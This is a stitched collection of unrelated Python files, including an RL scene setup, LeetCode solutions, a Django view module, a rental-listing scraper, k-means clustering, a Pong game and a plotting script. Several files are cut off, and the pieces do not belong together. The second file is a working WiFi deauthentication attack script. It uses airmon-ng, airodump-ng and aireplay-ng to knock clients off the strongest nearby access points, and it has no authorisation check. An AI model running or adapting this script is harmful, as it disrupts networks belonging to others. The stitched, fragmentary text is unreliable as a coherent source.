    reward_entity = sm.Asset(name="reward_entity", position=[-40, 21, 0])
    scene += reward_entity
    # Default reward: based on distance between the reward entity and the actor.
    reward = sm.RewardFunction(entity_a=reward_entity, entity_b=actor)
    actor += reward
    # Add state sensor, for position of agent
    actor += sm.StateSensor(target_entity=actor, properties=["position"])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--build_exe", help="path to unity engine build executable", required=False, type=str, default=""
)
parser.add_argument("-n", "--n_frames", help="number of frames to simulate", required=False, type=int, default=30)
args = parser.parse_args()
build_exe = args.build_exe if args.build_exe != "None" else None
scene = sm.Scene.create_from("simulate-tests/MountainCar/MountainCar.gltf", engine="unity", engine_exe=build_exe)
add_rl_components_to_scene(scene)
env = sm.RLEnv(scene)
model = PPO("MultiInputPolicy", env, verbose=3, n_epochs=2)
model.learn(total_timesteps=10000)
|
#jam
import sys,os,platform
import time
import subprocess
import multiprocessing
import threading
import pandas as pd
#subprocess.call(["python3","test.py"])
#abc=subprocess.check_output(["python3","test.py"])
# print("abc")
# lists=subprocess.Popen(["python3","test.py"],stdout=subprocess.PIPE)
# try:
# abc=lists.communicate(timeout=2)
# except subprocess.TimeoutExpired:
# lists.kill()
# abc=lists.communicate()
# print(abc)
def find_interface():
    """Return the name of the first interface reported by `iwconfig`.

    NOTE(review): assumes the first token of the first output line is the
    wireless interface — may mis-detect on multi-interface hosts; confirm.
    """
    moni=subprocess.Popen(['iwconfig'],text=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    all_infac,err=(moni.communicate())
    wireless_inter=all_infac.split("\n")[0].split()[0]
    return wireless_inter
def start_monitorMode():
    """Put the detected wireless interface into monitor mode via airmon-ng."""
    IFace=find_interface()
    # Earlier manual approach using ip/iw, kept commented for reference:
    # act_Mon1_string="sudo ip link set "+IFace+" down"
    # act_Mon2_string="sudo iw "+IFace+" set monitor control"
    # act_Mon3_string="sudo ip link set "+IFace+" up"
    # cmd1=subprocess.Popen(act_Mon1_string.split(" "),)
    # cmd2=subprocess.Popen(act_Mon2_string.split(" "),)
    # cmd3=subprocess.Popen(act_Mon3_string.split(" "),)
    #
    # print("\t\t\tShould disabled network Manager \nPress y/n (yes/no)")
    # x=input()
    # if(x=='y'):
    #     dis_networkManager_string="service NetworkManager stop"
    #     # cmd4=subprocess.Popen(act_Mon3_string.split(" "),)
    # else:
    #     print("Cant continue with out disabling network")
    act_mon="sudo airmon-ng start "+IFace
    cmd_start_mon=subprocess.Popen(act_mon.split(" "),text=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    # Wait for airmon-ng to finish before continuing.
    cmd_start_mon.wait()
    cmd_start_mon.terminate()
    # print(get_InterFace)
def getting_bssid():
    """Scan nearby APs with airodump-ng and return (bssids frame, interface).

    Runs airodump-ng for ~9s writing out-01.csv, then keeps APs whose power
    is between -80 and -10 dBm, strongest first.
    NOTE(review): if the scan exits non-zero before the 10s subprocess
    timeout, `check=True` raises CalledProcessError which is not handled
    here — confirm the intended flow.
    """
    InterFace=find_interface()
    act_bssid="timeout 9s airodump-ng -w out --output-format csv "+InterFace
    print(act_bssid.split())
    try:
        cmd_bssid = subprocess.run(
            act_bssid.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE,check=True,timeout=10,)
    except subprocess.TimeoutExpired:
        # Handle exception
        print("sucessfull data")
    read_file = pd.read_csv('./out-01.csv')
    read_file = read_file.sort_values(" Power",ascending = False,)
    # Keep APs in a usable signal range (-80 dBm to -10 dBm).
    read_file = read_file.loc[(read_file[" Power"]<=-10) & (read_file[" Power"]>=-80)]
    bssids = read_file.loc[:,['BSSID',' channel',' ESSID',' Power']]
    bssids = bssids.dropna()
    print(bssids)
    return bssids,InterFace
def deauth_one(BSSID, InterFace):
    """Send 10 deauth frames to one access point via aireplay-ng."""
    command = "aireplay-ng --deauth 10 -a " + BSSID + " " + InterFace
    print(command.split(" "))
    proc = subprocess.Popen(command.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE,)
    out, err = proc.communicate()
    print(out)
    print("output")
def deauth_all(bssids, InterFace):
    """Deauth the strongest scanned access points in parallel (one process each)."""
    all_process = []
    # Robustness fix: don't assume at least 4 rows were scanned; clamp the
    # hard-coded range(4) to the rows actually present to avoid IndexError.
    for i in range(min(4, len(bssids))):
        process = multiprocessing.Process(target=deauth_one, args=(bssids.iloc[i, 0], InterFace))
        process.start()
        all_process.append(process)
    for p in all_process:
        p.join()
def medula():
    """Interactive entry point: confirm, then scan and deauth nearby APs.

    NOTE(review): answering anything other than "y" recurses forever with the
    same prompt — there is no way to decline and exit.
    """
    print("medu the wifi y/n")
    x=input()
    if(x=="y"):
        start_monitorMode()
        bssids,InterFace=getting_bssid()
        deauth_all(bssids,InterFace)
        print("yahooo")
    else:
        medula()
# The aircrack-ng workflow is only attempted on Linux hosts.
system_os=platform.system()
print(system_os)
if system_os == 'Linux':
    medula()
else:
    print('no')
# str=subprocess.run(["ls","-al"],capture_output=True,text=True)
# print(str.stdout.split("\n"))
|
# NOTE(review): this script is Python 2 (print statements, `Tkinter` module);
# it will not run under Python 3 without conversion (print(), `tkinter`).
from sys import argv, exit
from Tkinter import Tk
# If Tk creation fails the error is printed but execution continues, leaving
# `tkObj` undefined below — presumably the author expects it to succeed.
try:
    tkObj = Tk()
except Exception as e:
    print "Failed to create the Tkinter object: " + str(e)
cssPath = tkObj.clipboard_get()
print "The CSS path retrieved from your clipboard is:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + str(cssPath)
#if len(argv)!=2:
#    exit("Something went wrong! Give CSS Path as an argument enclused in quotes")
#if argv[1]=="" or len(argv[1])<10:
#    exit("Are you sure the CSS Path is corect?")
#cssPath = argv[1]
# List of symbols, tags and elements to remove from the CSS path
graveList = [" >", ".ng-scope", ".ng-isolate-scope", ".ng-include", ".ng-view", ".ng-animate"]
# Strip Angular helper classes and child combinators to shorten the selector.
for mark in graveList:
    cssPath = cssPath.replace(mark,"")
print "\n\nThe modified CSS path sent to your clipboard is:"
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print cssPath
tkObj.clipboard_clear()
tkObj.clipboard_append(cssPath)
|
#
# @lc app=leetcode.cn id=77 lang=python3
#
# [77] 组合
#
class Solution:
    """LeetCode 77: all k-element combinations of 1..n."""

    def combine(self, n: int, k: int) -> List[List[int]]:
        """Return every combination of k numbers chosen from 1..n, in
        lexicographic order of the first differing element."""
        res = []
        self.dfs(n, k, 1, [], res)
        return res

    def dfs(self, n, k, start, path, res):
        """Backtracking helper: extend `path` with numbers >= `start` until
        `k` more picks remain, appending completed paths to `res`."""
        if k == 0:
            # Each path is generated exactly once, so the original
            # `path not in res` duplicate scan (O(len(res)) per leaf) was
            # pure overhead and has been removed.
            res.append(path)
            return
        # Prune: the largest useful start value is n - k + 1; beyond that too
        # few numbers remain to pick k more.
        for i in range(start, n - k + 2):
            self.dfs(n, k - 1, i + 1, path + [i], res)
|
class Node:
    """Singly linked list node holding a `value` and a `next` reference."""

    def __init__(self, value, next=None):
        self.value, self.next = value, next
class LinkedList:
    """Minimal singly linked list with traversal printing and in-place reversal."""

    def __init__(self):
        self.head = None

    def listprint(self):
        """Print each node's value from head to tail, one per line."""
        node = self.head
        while node is not None:
            print(node.value)
            node = node.next

    def reverse(self):
        """Reverse the list in place, then print it (same as the original)."""
        prev, curr = None, self.head
        while curr is not None:
            # Simultaneous assignment: RHS is evaluated first, so this flips
            # curr.next to the previous node and advances both cursors.
            curr.next, prev, curr = prev, curr, curr.next
        self.head = prev
        self.listprint()
# Demo: build Mon -> Tue -> Wed, print it, then reverse and print again.
s_linked_list = LinkedList()
node1 = Node("Mon")
node2 = Node("Tue")
node3 = Node("Wed")
s_linked_list.head = node1
s_linked_list.head.next = node2
node2.next = node3
s_linked_list.listprint()
print('Reverse list:')
s_linked_list.reverse()
|
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from apps.lib.template import render_to
from .item import generate_thumbnail_of_item
from .models import Item
@render_to('recent.html')
def recent(request):
    """Render the 30 most recently created items."""
    newest = Item.objects.order_by('-created_at')[:30]
    return {'items': newest}
def image(request, id):
    """Serve an item's raw file bytes with its stored MIME type.

    Raises Http404 (via get_object_or_404) when no Item with this id exists.
    """
    # TODO: currently it is assumed that we have only image files
    item = get_object_or_404(Item, id=int(id))
    with open(item.path, 'rb') as fin:
        return HttpResponse(fin.read(), content_type=item.type.mime_type)
def thumbnail(request, id):
    """Return a 180x160 PNG thumbnail for the item, generated on demand."""
    item = get_object_or_404(Item, id=int(id))
    # Renamed the local so it no longer shadows this view function's name.
    png_data = generate_thumbnail_of_item(item, 180, 160, 'png')
    return HttpResponse(png_data, content_type='image/png')
|
#!/usr/bin/env python
import sys
sys.path.append('/usr/local/lib/python3.6/site-packages')
# 链家租房
import requests
from tools.UserAgent import USERAGENT_LIST
from lxml import etree
import random
import time
import re
import pymysql
import gevent
from tools.spider_58 import five_eight
from tools.ziru import ZiruSpider
class LianjiaSpider(object):
    """Scraper for Lianjia (bj.lianjia.com) rental listings.

    Walks the /zufang listing pages, extracts each listing's title, price,
    detail URL and coordinates, and inserts one row per listing into the
    MySQL table ``LianJia_table``.
    """
    def __init__(self):
        self.url = "https://bj.lianjia.com/"
        # NOTE(review): plaintext DB credentials are hard-coded -- consider
        # moving them to configuration.
        self.db = pymysql.connect('localhost', 'root', '123456', 'House_db', charset='utf8')
        self.cursor = self.db.cursor()
    def get_headers(self):
        # Rotate the User-Agent on every request to reduce blocking.
        headers = {'User-Agent': random.choice(USERAGENT_LIST)}
        return headers
    # Helper: fetch a page and return its decoded HTML text.
    def get_html(self, url):
        res = requests.get(url=url, headers=self.get_headers())
        res.encoding = 'utf-8'
        html = res.text
        return html
    # Helper: evaluate an XPath expression against an HTML document.
    # Example xpath_dbs: '//div[@class="content__list--item"]/a/@href'
    def xpath_func(self, html, xpath_dbs):
        parse_obj = etree.HTML(html)
        re_list = parse_obj.xpath(xpath_dbs)
        return re_list
    # Helper: DOTALL regex search, returns all matches.
    def re_func(self, re_dbs, html):
        pattern = re.compile(re_dbs, re.S)
        r_list = pattern.findall(html)
        return r_list
    def parse_html(self, url):
        """Parse one listing page: extract each listing and insert it into MySQL."""
        item = {}
        a_html = self.get_html(url)
        # Base XPath: one node per listing card.
        xpath = '//div[@class="content__list--item"]'
        li_list = self.xpath_func(a_html, xpath)
        # xpath_dbs1 = '//div[@class="content__list--item"]/a/@href'
        # xpath_dbs2 = '//div[@class="content__list--item"]//p[@class="content__list--item--title twoline"]/a/text()'
        # info_list = self.xpath_func(a_html, xpath_dbs2)
        # ['/zufang/BJ2341868613260558336.html'','','','']
        # All listing detail links are collected here.
        # print(li_list)
        # Request each listing link to get coordinates + name + detail URL +
        # other info (price).
        for li in li_list:
            # 1. listing detail link
            re_dbs1 = './a/@href'
            href = li.xpath(re_dbs1)
            second_url = self.url + href[0]
            item['url'] = second_url
            # 2. listing title text
            re_dbs2 = './/p[@class="content__list--item--title twoline"]/a/text()'
            message = li.xpath(re_dbs2)
            item['message'] = message[0].strip()
            # 3. price
            re_dbs3 = './/span/em/text()'
            price = li.xpath(re_dbs3)
            item['price'] = float(price[0].strip())
            # 4. listing coordinates -- e.g. {'lon:': '116.192696', 'lat:': '39.921511'}
            locat = self.get_locat(second_url)
            item['locat'] = locat
            # No usable photo is scraped; pick a random local placeholder image.
            imgs = './static/imgs/img'+str(random.randint(11,18))+'.jpeg'
            # Insert the row into the database.
            value = [item['message'],'链家网',item['message'],item['price'],item['locat'][0],item['locat'][1],item['url'],imgs]
            print(value)
            try:
                ins = 'insert into LianJia_table(house_name,platform,house_message,price,lon,lat,url,images) values(%s,%s,%s,%s,%s,%s,%s,%s)'
                self.cursor.execute(ins,value)
                self.db.commit()
            except Exception as e:
                print(e)
    # Fetch a listing detail page and pull [lon, lat] out of its inline JS.
    def get_locat(self, second_url):
        locat = {}
        second_html = self.get_html(second_url)
        re_dbs = "var contact = {};.*?longitude: '(.*?)'.*?latitude: '(.*?)'.*?</script>"
        a_list = self.re_func(re_dbs, second_html)
        # locat['lon:'] = a_list[0][0].strip()
        # locat['lat:'] = a_list[0][1].strip()
        a_list = [float(i) for i in a_list[0]]
        return a_list
    def run(self):
        """Crawl listing pages 1..69 with a 1-3 second random delay per page."""
        for pg in range(1, 70):
            url = self.url + 'zufang/pg{}'.format(pg)
            self.parse_html(url)
            time.sleep(random.uniform(1, 3))
if __name__ == '__main__':
    # Run the three site spiders (Lianjia, 58.com, Ziroom) concurrently on one
    # thread via gevent greenlets.
    from gevent import monkey
    # NOTE(review): monkey.patch_socket() should normally run before any module
    # that creates sockets is imported -- confirm requests/pymysql behave when
    # patched this late.
    monkey.patch_socket()
    l = []
    lian_jia_spider = LianjiaSpider()
    spider_58 = five_eight()
    spider_ziru = ZiruSpider()
    spider1 = gevent.spawn(lian_jia_spider.run)
    spider2 = gevent.spawn(spider_58.run)
    spider3 = gevent.spawn(spider_ziru.run)
    l.append(spider1)
    l.append(spider2)
    l.append(spider3)
    gevent.joinall(l)
|
## Group members : Myungjin Lee, Krishna Akhil Maddali, Yash Shahapurkar
import copy
import numpy
import random
from matplotlib import pyplot as plt
# K-means (k=3) on 2-D points read from clusters.txt (one "x,y" pair per line).
inp_file='clusters.txt'
f_inp_obj=open(inp_file, 'r')
x=[]
y=[]
for line in f_inp_obj:
    tmp=line.split(',')
    if len(tmp)==2:
        x.append(float(tmp[0]))
        y.append(float(tmp[1]))
data=numpy.array(list(zip(x, y)))
# Initialize k random integer centroids inside the data's bounding box.
cent_x=[]
cent_y=[]
k=3
for i in range(k):
    cent_x.append(random.randrange(int(numpy.min(x)), int(numpy.max(x))))
    cent_y.append(random.randrange(int(numpy.min(y)), int(numpy.max(y))))
cent=numpy.array(list(zip(cent_x, cent_y)), dtype=numpy.float32)
clus=numpy.zeros(len(data))
labels=numpy.zeros(len(data))
flag=True
# Lloyd's algorithm: assign each point to its nearest centroid, recompute the
# centroids as cluster means, repeat until the centroids stop moving.
while flag:
    for i in range(len(data)):
        # NOTE(review): the literal 3 here duplicates k -- keep them in sync.
        dist=numpy.zeros(3).reshape(3,1)
        for j in range(k):
            dist[j]=numpy.linalg.norm(data[i]-cent[j])
        # An empty cluster makes its recomputed centroid NaN; when detected,
        # restart with fresh random centroids.
        if numpy.isnan(dist).any():
            nan_x=[]
            nan_y=[]
            for l in range(k):
                nan_x.append(random.randrange(int(numpy.min(x)), int(numpy.max(x))))
                nan_y.append(random.randrange(int(numpy.min(y)), int(numpy.max(y))))
            cent=numpy.array(list(zip(nan_x, nan_y)), dtype=float)
        clus[i]=numpy.argmin(dist)
    cent_old=copy.copy(cent)
    # Recompute each centroid as the mean of the points assigned to it.
    for j in range(k):
        tmp_x=[]
        tmp_y=[]
        for i in range(len(data)):
            if clus[i]==j:
                tmp_x.append(data[i][0])
                tmp_y.append(data[i][1])
        cent[j][0]=numpy.mean(tmp_x)
        cent[j][1]=numpy.mean(tmp_y)
        del tmp_x
        del tmp_y
    # Converged: no centroid moved in this iteration.
    if (cent==cent_old).all():
        flag=False
print(cent)
# Final hard assignment of every point to its nearest converged centroid.
for i in range(len(data)):
    distance = numpy.zeros((3,1))
    for j in range(k):
        distance[j] = numpy.linalg.norm(data[i] - cent[j])
    labels[i] = numpy.argmin(distance)
plt.scatter(data[:,0], data[:,1],c=labels ,s=50, cmap='viridis')
plt.scatter(cent[:,0], cent[:,1], marker='*', c='r', s=100)
plt.show()
|
# Exercise script: print facts about a person with f-strings.
name = 'zed a shaw'
age = 35 # not a lie
height = 74 # inches
weight = 180 # lbs
height_cm = height * 2.54 # inches -> centimeters
weight_kg = weight * 0.453592 # pounds -> kilograms
eyes = 'blue'
teeth = 'white'
hair = 'brown'
print(f"Let's talk about {name}.")
print(f"He's {height} inches tall")
print(f"(that's {height_cm} in cm)")# convert to cm
print(f"He's {weight} pounds heavy")
print(f"(that's {weight_kg} in kg)")# convert to kg
# Sum of mixed units -- just a number-crunching exercise, not meaningful.
total = age + height + weight
print(f"If we add {age}, {height}, and {weight} we get {total}.")
|
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/topics/items.html
from scrapy.item import Item, Field
class Etymology(Item):
    """Scrapy item for one etymology-dictionary entry: the headword and its
    link, plus a word referenced in the description and that word's link."""
    entry_word = Field()
    entry_link = Field()
    description_word = Field()
    description_link = Field()
|
def roundup(k):
    """Round `k` up to the nearest integer (ceiling) and return it as int.

    Replaces the hand-rolled `k // 1 + 1` ceiling with the standard-library
    equivalent; behavior is identical for ints and floats (including
    negatives and whole-number floats like 5.0).
    """
    import math  # local import keeps this snippet self-contained
    return math.ceil(k)
# Read n nail lengths, an accepted [low, high] range and a per-unit cost; then
# report the percentage of nails within spec and the monetary loss on rejects.
n = int(input())
pakls = [float(inp) for inp in input().split()[:n]]
bound = [float(inp) for inp in input().split()]
cost = int(input())
unf = len(pakls)  # count of nails that meet the standard
loss = 0
for pak in pakls:
    if not (bound[0] <= pak <= bound[1]):
        unf -= 1
        # Loss per reject: cost times the nail's length rounded up.
        loss += cost * roundup(pak)
if unf == len(pakls): print ('100% paku memenuhi standar')
else:
    perc = round(100 * unf / len(pakls))
    print('{}% paku memenuhi standar, kerugian {} rupiah'.format(perc, loss))
|
import random
def getElements():
    """Return a list of 10 random integers, each drawn from 1..20 inclusive."""
    return [random.randint(1, 20) for _ in range(10)]
# Game: the player wins only if all three guesses appear in the random list.
lst = getElements()
ele1 = int(input("Guess a number in range (1-20) :"))
ele2 = int(input("Guess a number in range (1-20) :"))
ele3 = int(input("Guess a number in range (1-20) :"))
if ele1 in lst and ele2 in lst and ele3 in lst:
    print(f"Success")
else:
    print(f"Fail")
# Reveal the list so the player can check the result.
print(lst)
|
# For each value that occurs at least twice in A, measure the index distance
# between its first and last occurrence; print the minimum such distance, or
# -1 when no value repeats.
n = int(input().strip())
A = [int(A_temp) for A_temp in input().strip().split(' ')]
b=set(A)
# NOTE(review): the minimum is seeded with max(A), which assumes the true
# answer never exceeds the largest element -- verify for small inputs.
ans=max(A)
c=0  # counts distinct values that do NOT repeat
for i in b:
    if A.count(i)>=2:
        # len(A)-A[::-1].index(i)-1 is the index of i's last occurrence.
        ans=min(ans,abs((A.index(i))-(len(A)-A[::-1].index(i)-1)))
    else:
        c+=1
if(c==len(A)):
    print(-1)
else:
    print(ans)
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 16 16:02:55 2019
@author: leona
"""
# Now, from the cleaned intros and plots, we build the dictionary mapping "index": word, giving a unique association between each word in the dataset we care about and a number. We save it as a JSON file, as with the other dictionaries that follow, so the search engine can reuse them at any time.
# Build a word -> id mapping over the 30000 cleaned film TSV files, then invert
# it into an id -> [files containing that word] index; persist both as JSON.
dictionar = {}
k = 0
for i in range(30000):
    # Columns 14 and 15 of each cleaned TSV hold the text fields to index.
    # Files are now closed promptly (the original leaked every handle).
    with open("Cleantsv/filmclean-"+str(i)+'.tsv', encoding="utf8") as file1:
        line = file1.read()
    words = line.split('\t')
    wordssplitted1 = words[14].split()
    wordssplitted2 = words[15].split()
    # Assign the next free id to every word not seen before.
    for w in wordssplitted1 + wordssplitted2:
        if w not in dictionar:
            dictionar[w] = str(k)
            k = k + 1
import json
with open('Dictionary.json', 'w') as fp:
    json.dump(dictionar, fp)
# Inverted index: word id -> list of files that contain the word.
dictionar2 = {}
for i in range(30000):
    file = "Cleantsv/filmclean-"+str(i)+'.tsv'
    with open(file, encoding="utf8") as file1:
        line = file1.read()
    words = line.split('\t')
    wordssplitted1 = words[14].split()
    wordssplitted2 = words[15].split()
    # Bug fix: the original looked words up in `diction[j]`, a name that does
    # not exist anywhere (NameError); the table built above is `dictionar`.
    for j in wordssplitted1 + wordssplitted2:
        code = dictionar[j]
        if code not in dictionar2:
            dictionar2[code] = [file]
        elif file not in dictionar2[code]:
            dictionar2[code].append(file)
import json
with open('Dictionary1.json', 'w') as fp:
    json.dump(dictionar2, fp)
|
"""
grpc test client
"""
from fastapi import FastAPI
from api.services.books import router
app = FastAPI(docs_url='/api', openapi_url='/api/openapi.json')
app.include_router(router, prefix='/api/book', tags=['book'])
|
import turtle
import winsound
import os # For screen clear command
# Screen: 800x600, black, manual refresh (tracer(0) + wn.update() in the loop).
wn = turtle.Screen()
wn.title("Mini project")
wn.bgcolor("black")
wn.setup(width = 800, height = 600)
wn.tracer(0)
#Score
score_a = 0
score_b = 0
#Ball: dx/dy are the per-frame velocity components
ball = turtle.Turtle()
ball.speed(0)
ball.shape("circle")
ball.color("white")
ball.penup()
ball.goto(0, 0)
ball.dx = 0.2
ball.dy = -0.2
# Pen: scoreboard text at the top of the screen
pen = turtle.Turtle()
pen.speed(0)
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0, 260)
pen.write("Player A: 0 Player B: 0",align="center",font=("Courier",24 ,"normal"))
# Mypen: writes the game-over banner at the bottom of the screen
mypen = turtle.Turtle()
mypen.speed(0)
mypen.color("white")
mypen.penup()
mypen.hideturtle()
mypen.goto(0, -260)
mypen.sec = 5  # NOTE(review): .sec appears unused -- confirm before removing
#Winning score banner (static text)
mypen1 = turtle.Turtle()
mypen1.speed(0)
mypen1.color("white")
mypen1.penup()
mypen1.hideturtle()
mypen1.goto(0, 230)
mypen1.sec = 5
mypen1.write("Winning score : 5",align="center",font=("Courier", 20 ,"normal"))
class paddle(turtle.Turtle):
    """Pong paddle; configured via properties() rather than __init__."""
    def properties(self,name,sp,sh,co,x,y):
        """Second-stage constructor: set name, animation speed, shape, color
        and position. Callers must invoke this right after paddle(), or the
        turtle is left unconfigured."""
        self.name = name
        self.speed(sp)
        self.shape(sh)
        self.color(co)
        # 20px base square stretched to 100px tall x 20px wide.
        self.shapesize(stretch_wid=5, stretch_len=1)
        self.penup()
        self.goto(x,y)
# Left paddle (A) at x=-350, right paddle (B) at x=350.
a = paddle()
b = paddle()
# "paddle_a", 0, "square", "white", -350, 0
# "paddle_b", 0, "square", "white", 0, -350
a.properties("paddle_a", 0, "square", "white", -350, 0)
b.properties("paddle_b", 0, "square", "white", 350, 0)
# Key handlers: each moves its paddle 20px vertically per press.
def paddle_a_up():
    """Move the left paddle 20px up."""
    y = a.ycor()
    y += 20
    a.sety(y)
def paddle_a_down():
    """Move the left paddle 20px down."""
    y = a.ycor()
    y -= 20
    a.sety(y)
def paddle_b_up():
    """Move the right paddle 20px up."""
    y = b.ycor()
    y += 20
    b.sety(y)
def paddle_b_down():
    """Move the right paddle 20px down."""
    y = b.ycor()
    y -= 20
    b.sety(y)
def countdown():
    """Schedule quit() to run after 1 second. (No key is bound to this.)"""
    wn.ontimer(quit,1000)
#Keybindings: w/s move the left paddle, arrow keys the right one
wn.listen()
wn.onkeypress(paddle_a_up, "w")
wn.onkeypress(paddle_a_down, "s")
wn.onkeypress(paddle_b_up, "Up")
wn.onkeypress(paddle_b_down, "Down")
#Main game loop
while True:
    wn.update()
    #Move the ball
    ball.setx(ball.xcor() + ball.dx)
    ball.sety(ball.ycor() + ball.dy)
    # Bounce off the top/bottom walls (winsound is Windows-only stdlib).
    if ball.ycor() > 290:
        ball.sety(290)
        ball.dy *= -1
        winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
    if ball.ycor() < -290:
        ball.sety(-290)
        ball.dy *= -1
        winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
    # Ball crossed the right edge: player A scores; reset to center.
    if ball.xcor() > 390:
        ball.goto(0, 0)
        ball.dx *= -1
        score_a +=1
        pen.clear()
        pen.write("Player A: {} Player B: {}".format(score_a,score_b),align="center",font=("Courier",24 ,"normal"))
    # Ball crossed the left edge: player B scores.
    if ball.xcor() < -390:
        ball.goto(0, 0)
        ball.dx *= -1
        score_b +=1
        pen.clear()
        pen.write("Player A: {} Player B: {}".format(score_a,score_b),align="center",font=("Courier",24 ,"normal"))
    # Paddle and ball collisions (paddle is 100px tall, centered at ycor).
    if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < b.ycor() + 40 and ball.ycor() > b.ycor() -40):
        ball.setx(340)
        ball.dx *=-1
        winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
    if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < a.ycor() + 40 and ball.ycor() > a.ycor() -40):
        ball.setx(-340)
        ball.dx *=-1
        winsound.PlaySound('bounce.wav', winsound.SND_ASYNC)
    # First to 5 wins.
    # NOTE(review): turtle.done() does not break this while-loop, so once a
    # player reaches 5 the banner/sound re-trigger every frame -- verify.
    if score_a == 5 :
        mypen.write("Game over, Player A wins the game",align="center",font=("Courier",24 ,"normal"))
        winsound.PlaySound('gameover.wav', winsound.SND_ASYNC)
        turtle.done()
    elif score_b == 5 :
        mypen.write("Game over Player B wins the game",align="center",font=("Courier",24 ,"normal"))
        winsound.PlaySound('gameover.wav', winsound.SND_ASYNC)
        turtle.done()
#!/usr/bin/env python
from __future__ import print_function
import sys
import matplotlib
matplotlib.use('Agg') # don't try to use $DISPLAY
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.gridspec as gridspec
import numpy as np
import math
import operator
def setCustomHatchWidth(customWidth):
    """
    Monkeypatch the pdf writing for hatches, to change the hatch line width
    """
    # make sure you have the correct imports,
    # they may differ depending on the matplotlib version
    # NOTE(review): matplotlib.externals.six exists only in certain matplotlib
    # releases -- this patch is pinned to that internal module layout.
    import matplotlib.backends.backend_pdf
    from matplotlib.externals import six
    from matplotlib.backends.backend_pdf import Name, Op
    from matplotlib.transforms import Affine2D
    from matplotlib.path import Path
    # Copy of PdfFile.writeHatches with the hard-coded hatch line width
    # replaced by `customWidth` (captured by closure) at Op.setlinewidth.
    def _writeHatches(self):
        hatchDict = dict()
        sidelen = 72.0
        for hatch_style, name in six.iteritems(self.hatchPatterns):
            ob = self.reserveObject('hatch pattern')
            hatchDict[name] = ob
            res = {'Procsets':
                   [Name(x) for x in "PDF Text ImageB ImageC ImageI".split()]}
            self.beginStream(
                ob.id, None,
                {'Type': Name('Pattern'),
                 'PatternType': 1, 'PaintType': 1, 'TilingType': 1,
                 'BBox': [0, 0, sidelen, sidelen],
                 'XStep': sidelen, 'YStep': sidelen,
                 'Resources': res})
            stroke_rgb, fill_rgb, path = hatch_style
            self.output(stroke_rgb[0], stroke_rgb[1], stroke_rgb[2],
                        Op.setrgb_stroke)
            if fill_rgb is not None:
                self.output(fill_rgb[0], fill_rgb[1], fill_rgb[2],
                            Op.setrgb_nonstroke,
                            0, 0, sidelen, sidelen, Op.rectangle,
                            Op.fill)
            # The customized line width -- the whole point of this patch.
            self.output(customWidth, Op.setlinewidth)
            # TODO: We could make this dpi-dependent, but that would be
            # an API change
            self.output(*self.pathOperations(
                Path.hatch(path),
                Affine2D().scale(sidelen),
                simplify=False))
            self.output(Op.stroke)
        self.endStream()
        self.writeObject(self.hatchObject, hatchDict)
    matplotlib.backends.backend_pdf.PdfFile.writeHatches = _writeHatches
def parse_hets(filename):
    """Parse a tab-separated hets file.

    The header row is skipped; each following row is "<dp>\t<n>\t<h>".
    Parsing stops at the first row whose n is 0. Returns two parallel lists:
    the per-depth ratios h/n and the raw counts n.
    """
    ratios, counts = [], []
    with open(filename) as fh:
        next(fh)  # header row
        for raw in fh:
            cols = raw.rstrip().split("\t")
            assert(len(cols) == 3)
            _, n_val, h_val = (int(c) for c in cols)
            if n_val == 0:
                break
            ratios.append(h_val / float(n_val))
            counts.append(n_val)
    return ratios, counts
if __name__ == "__main__":
if len(sys.argv) < 3:
print("usage: {} out.pdf hets.txt".format(sys.argv[0]), file=sys.stderr)
exit(1)
setCustomHatchWidth(1)
pdf = PdfPages(sys.argv[1])
#fig_w, fig_h = plt.figaspect(9.0/16.0)
fig_w, fig_h = plt.figaspect(3.0/4.0)
fig1 = plt.figure(figsize=(fig_w, fig_h))
gs1 = gridspec.GridSpec(2, 1)
ax1 = fig1.add_subplot(gs1[0])
ax2 = fig1.add_subplot(gs1[1], sharex=ax1)
#ax1 = fig1.add_subplot(111)
# black, orange, sky blue, blueish green, yellow, dark blue, vermillion, reddish purple
# pallete = ("#000000", "#906000", "#357090", "#006050", "#959025", "#004570", "#804000", "#806070")
#pal = ["#1b9e77", "#d95f02", "#7570b3"]
pal = ["#006050", "#806070", "#959025"]
facecols = ['lightblue', '#660000', 'yellow']
edgecols = ['darkblue', '#660000', 'darkyellow']
vlinestyles = ['-', '--', '-x']
fills = [True, False, True]
hatches = ['', 'xx', '--']
alpha = 1.0 #0.6
barwidth = 1.0
baroffset = 0.5
xlim = 0
ylim = False
for col, ec, hatch, fill, vls, fn in zip(facecols, edgecols, hatches, fills, vlinestyles, sys.argv[2:]):
h, n = parse_hets(fn)
n100 = np.sum(n[1:])
n05 = 0.05*n100
n95 = 0.95*n100
n99 = 0.99*n100
sum_n = 0
edf_n = [0.0,]
i05 = False
i95 = False
i99 = False
for i, nn in enumerate(n[1:], start=2):
sum_n += nn
edf_n.append(float(sum_n)/n100)
if not i05 and sum_n > n05:
i05 = i
if not i95 and sum_n > n95:
i95 = i
if not i99 and sum_n > n99:
i99 = i
#print(i05, i95, i99)
dph = list(enumerate(h[i05-1:i99], start=i05))
dph = sorted(dph, key=operator.itemgetter(1))
sum_n = 0
for _dp, _h in dph:
sum_n += n[_dp-1]
edf = float(sum_n)/n100
print(_dp, _h, edf, sep="\t")
x = np.arange(1, len(h)+1)
ax1.bar(x-baroffset, edf_n, width=barwidth, alpha=alpha, hatch=hatch, color=col, edgecolor=ec, fill=fill, label=fn)
